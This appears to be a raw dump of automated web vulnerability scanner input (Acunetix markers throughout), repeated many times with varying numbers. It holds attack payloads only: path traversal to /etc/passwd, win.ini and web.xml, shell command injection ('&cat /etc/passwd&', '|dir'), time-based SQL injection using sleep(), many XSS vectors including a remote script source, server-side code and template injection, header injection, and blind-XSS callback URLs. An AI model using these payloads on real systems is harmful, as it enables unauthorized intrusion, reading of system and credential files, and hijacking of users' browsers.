\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

................windowswin.ini

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

../../../../../../../../../../etc/passwd

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acu8123\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8123

1

${100333+100392}

cat /etc/passwd

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acux10012\xc0\xbez1\xc0\xbcz2a\x90bcxuca10012

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt >prompt(971767)</ScRiPt>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

|cat /etc/passwd#

1<script>prompt(989686)</script>

1

1&n945856=v901019

-1

)

../../../../../../../../../../etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

-1)

1

'|'ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF/web.xml

1<ScRiPt >prompt(947237)</ScRiPt>

1

!(()&&!|*|*|

testasp.vulnweb.com

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

"|"ld

WEB-INF\web.xml

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?956610></ScRiPt>

^(#$!@#$)(()))******

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

fHVVLAo7'

1

1

'"()

1

1

1<ScRiPt >prompt(921547)</ScRiPt>

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

ElrN4aTq')

1

1

1<video><source onerror="javascript:prompt(907310)">

1

1

"

hviMeaK1'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(926326)"></g></svg>

-1

1

/etc/passwd

||cat /etc/passwd

1

-1)

1

1<div style=width:expression(prompt(957073))>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

&dir

1

1

'

1

acunetix_wvs_invalid_filename

1<iframe src='data:text/html

1

-1))

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

1

e6BunKyG'

1<body onload=prompt(971704)>

comments

http://hitOeGGIkLWm8.bxss.me/

"&dir&"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

comments

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(936573)>

1

xay2VTw2')

1

1

${@print(md5(acunetix_wvs_security_test))}\

|dir

1

comments/.

file:///etc/passwd

1

2lA97jaR'))

1<img src=xyz OnErRor=prompt(911098)>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

'|dir

1

1

1<img/src=">" onerror=alert(920089)>

'"

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1<ScRiPt%20>prompt(911093)</sCripT>

1

<!--

1

WEB-INF/web.xml

1&lt

1

1

1

1

1

1

1

1'"()&%<ScRiPt >prompt(952177)</ScRiPt>

1

1

1

\xf6<img acu onmouseover=prompt(947609) //\xf6>

WEB-INF\web.xml

1

'"()&%<ScRiPt >prompt(948167)</ScRiPt>

1

1

1

1

1

1<input autofocus onfocus=prompt(963108)>

&cat /etc/passwd&

1_946215

1

../../../../../../../../../../windows/win.ini

response.write(9262780*9886071)

1

1

1

<a href='http://www.acunetix.com'>website security</a>

'&cat /etc/passwd&'

'+response.write(9262780*9886071)+'

SomeCustomInjectedHeader:injected_by_wvs

1

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../boot.ini

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

"+response.write(9262780*9886071)+"

1

1

1

1_sC6ad <ScRiPt >prompt(966446)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

`cat /etc/passwd`

acu10863\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10863

1

1

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

acux8809\xc0\xbez1\xc0\xbcz2a\x90bcxuca8809

................windowswin.ini

1

|cat /etc/passwd#

1

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<ScRiPt >prompt(941458)</ScRiPt>

1

'|'ld

..\..\..\..\..\..\..\..\windows\win.ini

1

../../../../../../../../../../etc/passwd

${100294+99814}

1<script>prompt(967654)</script>

1

-1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

"|"ld

1

1<ScRiPt >prompt(971328)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?941857></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

-1))

1some_inexistent_file_with_long_name%00.jpg

1

1

1&n975379=v956229

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt >prompt(941468)</ScRiPt>

'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

mAoY8aVM'

1

"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

1<video><source onerror="javascript:prompt(993990)">

ESzrnGNI')

1

)

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946333)"></g></svg>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

||cat /etc/passwd

zsv0TLi1'))

1

!(()&&!|*|*|

'"()

1

WEB-INF\web.xml

1<div style=width:expression(prompt(932610))>

1

&dir

1

1

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<iframe src='data:text/html

1

-1

'&dir&'

/etc/passwd

1

1

1

1

1

-1)

1

1<body onload=prompt(988451)>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"&dir&"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998651)>

-1))

'

1

1

|dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<img src=xyz OnErRor=prompt(906665)>

1

I50lXmb0'

1

http://hit8erVpcibW8.bxss.me/

"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'|dir

1<img/src=">" onerror=alert(967235)>

1

1

1

qz8XGu4n')

${@print(md5(acunetix_wvs_security_test))}

1

comments

1<ScRiPt%20>prompt(930924)</sCripT>

"|dir

http://www.acunetix.tst

'"

1'"()&%<ScRiPt >prompt(959924)</ScRiPt>

1

bV7fJNmG'))

comments

${@print(md5(acunetix_wvs_security_test))}\

'"()&%<ScRiPt >prompt(977497)</ScRiPt>

1

file:///etc/passwd

<!--

1&lt

1

1

comments/.

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1_951810

\xf6<img acu onmouseover=prompt(963126) //\xf6>

WEB-INF/web.xml

1

1

1

1

1

1

response.write(9669619*9592572)

WEB-INF\web.xml

1

1

1<input autofocus onfocus=prompt(985862)>

1

1

../../../../../../../../../../windows/win.ini

1

'+response.write(9669619*9592572)+'

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

"+response.write(9669619*9592572)+"

1

1

../../../../../../../../../../boot.ini

1

1

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

acu1218\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1218

../../../../../../../../../../windows/win.ini.jpg

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1_8buAx <ScRiPt >prompt(970732)</ScRiPt>

1

acux1024\xc0\xbez1\xc0\xbcz2a\x90bcxuca1024

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<ScRiPt >prompt(941737)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

1

"&cat /etc/passwd&"

1

1<script>prompt(913629)</script>

1

1

../../../../../../../../../../etc/passwd

................windowswin.ini

1

1

1

1<ScRiPt >prompt(988907)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${100477+99625}

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?912705></ScRiPt>

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt >prompt(952809)</ScRiPt>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

-1

1&n965247=v995076

1

1

1<video><source onerror="javascript:prompt(936233)">

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'|'ld

)

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(975201)"></g></svg>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

"|"ld

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

testasp.vulnweb.com

1

1<div style=width:expression(prompt(921321))>

^(#$!@#$)(()))******

1

WEB-INF/web.xml

HAcikKnK'

1

1

/etc/passwd

1

WEB-INF\web.xml

1

GWOM9F5B')

1<iframe src='data:text/html

1

'

1

1

1

TyBfWzAL'))

1

1

1<body onload=prompt(938223)>

1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

1

'"()

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984611)>

1

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<img src=xyz OnErRor=prompt(971073)>

1

-1))

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

CA2SmjFD'

'

1<img/src=">" onerror=alert(960573)>

acunetix_wvs_invalid_filename

1

1

http://hitKQl7xTRcc3.bxss.me/

'&dir&'

1

"

1<ScRiPt%20>prompt(940846)</sCripT>

sEr30Dz6')

comments

1

"&dir&"

1

file:///etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1&lt

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

EO2eavkq'))

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

http://www.acunetix.tst

\xf6<img acu onmouseover=prompt(914844) //\xf6>

1

'|dir

comments/.

1

'"

1

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(917681)</ScRiPt>

1<input autofocus onfocus=prompt(941273)>

1

1

"|dir

<!--

1

<a href='http://www.acunetix.com'>website security</a>

1

'"()&%<ScRiPt >prompt(945932)</ScRiPt>

WEB-INF\web.xml

1

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

../../../../../../../../../../windows/win.ini

1_950025

1

1

1

response.write(9821368*9929354)

1

1_HJYNs <ScRiPt >prompt(921816)</ScRiPt>

1

1

1

1_950025

../../../../../../../../../../windows/win.ini

1

1

1

1

1_HJYNs <ScRiPt >prompt(921816)</ScRiPt>

1

response.write(9821368*9929354)

1

1_950025

../../../../../../../../../../windows/win.ini

1

1

1

1

1_HJYNs <ScRiPt >prompt(921816)</ScRiPt>

1

response.write(9821368*9929354)

'+response.write(9821368*9929354)+'

1

1

1

1

1

"+response.write(9821368*9929354)+"

1

../../../../../../../../../../boot.ini

1

&cat /etc/passwd&

1

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../windows/win.ini.jpg

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

................windowswin.ini

1

1

cat /etc/passwd

1

acu4046\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4046

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

${100164+100459}

`cat /etc/passwd`

acux3760\xc0\xbez1\xc0\xbcz2a\x90bcxuca3760

1

1

../../../../../../../../../../etc/passwd.jpg

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1<ScRiPt >prompt(924790)</ScRiPt>

|cat /etc/passwd#

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n943305=v909720

1<script>prompt(995493)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'|'ld

-1

1<ScRiPt >prompt(993262)</ScRiPt>

1

1

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

-1)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?909855></ScRiPt>

1

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

1

!(()&&!|*|*|

1

1<ScRiPt >prompt(938011)</ScRiPt>

'

KtY1sUt8'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

1

1<video><source onerror="javascript:prompt(984433)">

WEB-INF/web.xml

1

^(#$!@#$)(()))******

'"()

1

"

GBC6syud')

/etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(968365)"></g></svg>

WEB-INF\web.xml

1

1

1

1

1<div style=width:expression(prompt(907038))>

1

||cat /etc/passwd

mxuSCR4l'))

1

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

&dir

-1

1<iframe src='data:text/html

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

'&dir&'

-1)

1<body onload=prompt(916001)>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

1

"&dir&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921207)>

-1))

"

http://hit3ZNoaAmJsa.bxss.me/

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

SJ8YRMES'

1<img src=xyz OnErRor=prompt(960126)>

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

|dir

1

file:///etc/passwd

1<img/src=">" onerror=alert(904576)>

1

3lPvOOg3')

1

1

1

comments

1

1

/\../\../\../\../\../\../\../etc/passwd

1<ScRiPt%20>prompt(950739)</sCripT>

'|dir

mQPOlDxX'))

1

1'"

comments/.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

WEB-INF/web.xml

1

1&lt

1

"|dir

1

\

1

1

1

WEB-INF\web.xml

\xf6<img acu onmouseover=prompt(979675) //\xf6>

1

1

1

1\xc0xa7\xc0\xa2

1

1

1<input autofocus onfocus=prompt(977096)>

1

'"

1

../../../../../../../../../../windows/win.ini

http://www.acunetix.tst

1

1'"()&%<ScRiPt >prompt(917313)</ScRiPt>

<a href='http://www.acunetix.com'>website security</a>

1

<!--

1

1

1

../../../../../../../../../../boot.ini

1

[url=http://www.acunetix.com]website security[/url]

'"()&%<ScRiPt >prompt(971491)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

response.write(9968384*9319317)

1

1_942915

1

1

'+response.write(9968384*9319317)+'

1

1_P43sM <ScRiPt >prompt(942516)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"+response.write(9968384*9319317)+"

&cat /etc/passwd&

1

................windowswin.ini

1

acu3508\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3508

'&cat /etc/passwd&'

1

acux6890\xc0\xbez1\xc0\xbcz2a\x90bcxuca6890

..\..\..\..\..\..\..\..\windows\win.ini

1

"&cat /etc/passwd&"

1

1

1

1<ScRiPt >prompt(979319)</ScRiPt>

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1<script>prompt(961488)</script>

SomeCustomInjectedHeader:injected_by_wvs

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

`cat /etc/passwd`

1

1

acu9313\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9313

1

1<ScRiPt >prompt(961257)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

|cat /etc/passwd#

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945798></ScRiPt>

1

acux6173\xc0\xbez1\xc0\xbcz2a\x90bcxuca6173

../../../../../../../../../../etc/passwd.jpg

'|'ld

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<ScRiPt >prompt(900763)</ScRiPt>

1

1

1

WEB-INF/web.xml

"|"ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt >prompt(988928)</ScRiPt>

-1

1

1

1<video><source onerror="javascript:prompt(989802)">

1

1

1<script>prompt(918885)</script>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

WEB-INF\web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(913856)"></g></svg>

1

1

1

1

${99609+99724}

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1<ScRiPt >prompt(956145)</ScRiPt>

'

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<div style=width:expression(prompt(970246))>

1

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

pgDQ4kNn'

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?991834></ScRiPt>

1&n984493=v921433

1<iframe src='data:text/html

1some_inexistent_file_with_long_name%00.jpg

1

1

1<ScRiPt >prompt(931241)</ScRiPt>

/etc/passwd

bQNEgQnb')

||cat /etc/passwd

1

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<body onload=prompt(921885)>

1<video><source onerror="javascript:prompt(953616)">

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

Wgf3tt2S'))

)

1

testasp.vulnweb.com

1

&dir

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(976391)"></g></svg>

-1

!(()&&!|*|*|

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996841)>

1

^(#$!@#$)(()))******

1

1<div style=width:expression(prompt(910122))>

1

1

-1)

'&dir&'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<iframe src='data:text/html

1<img src=xyz OnErRor=prompt(906753)>

"&dir&"

-1))

1

1

1

1

1<img/src=">" onerror=alert(979604)>

1<body onload=prompt(991689)>

1

nDuCtwNM'

1

|dir

1

1<ScRiPt%20>prompt(946991)</sCripT>

file:///etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(977066)>

5oQZ4MBt')

1

'"()

1

'|dir

1&lt

1

'

xj0Mpl6X'))

1<img src=xyz OnErRor=prompt(944665)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

/\../\../\../\../\../\../\../etc/passwd

1

1<img/src=">" onerror=alert(991580)>

1

"

1

\xf6<img acu onmouseover=prompt(974817) //\xf6>

"|dir

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1<ScRiPt%20>prompt(948412)</sCripT>

WEB-INF/web.xml

${@print(md5(acunetix_wvs_security_test))}\

http://hitoJs70SEsDG.bxss.me/

acunetix_wvs_invalid_filename

1<input autofocus onfocus=prompt(956422)>

1

WEB-INF\web.xml

1&lt

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

comments

1

1

1

../../../../../../../../../../windows/win.ini

1

\xf6<img acu onmouseover=prompt(976270) //\xf6>

[url=http://www.acunetix.com]website security[/url]

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

1

1<input autofocus onfocus=prompt(950004)>

1_Xw0Yo <ScRiPt >prompt(965844)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

comments/.

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu5748\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5748

1

<a href='http://www.acunetix.com'>website security</a>

1

'"

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

[url=http://www.acunetix.com]website security[/url]

acux3175\xc0\xbez1\xc0\xbcz2a\x90bcxuca3175

<!--

1

1

response.write(9162996*9752799)

................windowswin.ini

1'"()&%<ScRiPt >prompt(996477)</ScRiPt>

1

1

1

1

1<ScRiPt >prompt(915521)</ScRiPt>

1_vDY3N <ScRiPt >prompt(930903)</ScRiPt>

1

'"()&%<ScRiPt >prompt(909678)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

'+response.write(9162996*9752799)+'

1

1

1<script>prompt(929219)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

"+response.write(9162996*9752799)+"

1

1_950216

&cat /etc/passwd&

1

1

1

1<ScRiPt >prompt(904690)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

'&cat /etc/passwd&'

acu6090\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6090

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?947021></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

acux1999\xc0\xbez1\xc0\xbcz2a\x90bcxuca1999

1

../../../../../../../../../../etc/passwd

1<ScRiPt >prompt(971563)</ScRiPt>

1

1

1<ScRiPt >prompt(965795)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(932593)">

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944399)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

1<script>prompt(974487)</script>

`cat /etc/passwd`

1

WEB-INF\web.xml

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<div style=width:expression(prompt(960800))>

1

${100444+100269}

1<ScRiPt >prompt(968712)</ScRiPt>

1

|cat /etc/passwd#

1

1

-1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<iframe src='data:text/html

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917951></ScRiPt>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

'|'ld

1

1

1<ScRiPt >prompt(959348)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(906325)>

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

1

1

-1))

1<video><source onerror="javascript:prompt(905755)">

